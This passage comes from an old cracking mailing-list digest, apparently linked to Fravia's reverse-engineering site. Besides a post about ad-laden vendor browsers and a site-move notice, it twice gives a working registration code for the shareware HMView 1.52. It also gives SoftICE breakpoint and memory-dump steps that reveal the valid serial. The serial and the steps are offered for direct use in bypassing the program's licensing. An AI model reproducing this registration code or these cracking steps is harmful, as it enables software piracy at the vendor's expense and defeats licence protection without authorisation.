the same 12 digit size regcode. Name: User Company: <-- Leave Company Info Blank Code: OAPLLXTOPQWO If you use Softice, BPX on Hmemcpy and F12 back to program code area xxxx:00455686, then if you D on xxxx:00D42800 you will see the user name, bogus number and the echo. One of those self cracking program but good in that in installs under 500K with very few files. It writes the registration to an ini file so you can erase and reinstall if you need the practice. Like the simplicity. Thanks. wlc -----#3------------------------------------------------- Subject: (not quite cracking) The next stage of the browser wars... Manufacturers such as Compaq, Acer, and HP are going to be providing their "own" browsers with PCs; these browsers will be the default browser (though MSIE and/or Netscape may be bundled with the computr as well) and will deliver for your viewing pleasure a banner ad at the bottom of the browser that will change every thirty seconds (hmm, just like TV commercials). Supposedly the ad will be "always on top", and cannot be turned off by the user. Micro$oft has no problem with this as the browsers will be based on Explorer and Active X (kind of like "Brand X") technology...essentially allowing M$oft to entrench its internet technology as a standard at the small price of brand recognition: in these new browsers the MS or IE logo will not be apparent. I'm sure none of you buy pre-made computers such as Dells or (horror!) Compaq, but keep an eye out for the "evolution" of browsers towards becoming the foundation for the next-generation television--we may be cracking ads as well as protection schemes in a few years... _m PS full story at ********************************************************************** --source is Advertising Age, a newspaper I highly recommend for finding out what they plan to do to you before they do it...be sure to cut your doses heavily with material from ****************** or you may become one of them.... ;) ______________________________________________________ Get Your Private, Free Email at ********************** -----#4------------------------------------------------- Subject: New main site I had to move, the situation was getting unbearable every broken link and every server breakdown was landing everybody on a smut search engine. Ironical fate for my very own main page :-) You may want to update your links. Old main page will be frozen from now on Here is the snippet I have prepared for usenet, some of my visitors will surely publish it in the next days. 
--------------------------------------------------- 
Fravia's page of reverse engineering has moved from  
 (now frozen)
                       to 
        

New main page should work fine as soon as some feedback 
shows me the broken links. You may help as well if you feel like it.
I tell you what I will do:
RETALIATE! 
Read ideale.htm and exspecially general.htm and be prepared for some 
fireworks!
 I'll work on this stuff for the next couple of months.
There is a lot to learn.
There are many enemy to destroy, not only smutters.

A very crossed fravia+

-----#5-------------------------------------------------
Subject: Newer but still simple

Hail +ReZideNt:

Checked for HMView.  Found one at **************** by Bersoft called
HMView v1.52 zipped sized 537,900 bytes.  Must be an update since it
used the same 12 digit size regcode.  Seem to use a similar dll library
as to Liske 32 and wipes out data area after checking.  Had to close
down program and restart to enter info properly.

Name: User 
Company:   <-- Leave Company Info Blank
Code:  OAPLLXTOPQWO

If you use Softice, BPX on Hmemcpy and F12 back to program code area
xxxx:00455686, then if you D on xxxx:00D42800 you will see the user
name, bogus number and the echo.  One of those self cracking program
but good in that in installs with very few files.  It writes the 
registration to an ini file so you can erase and reinstall if you
need the practice.  I like the simplicity.  Will compare it with with 
Liske.  Thanks.

wlc

=====End of Issue 70====================================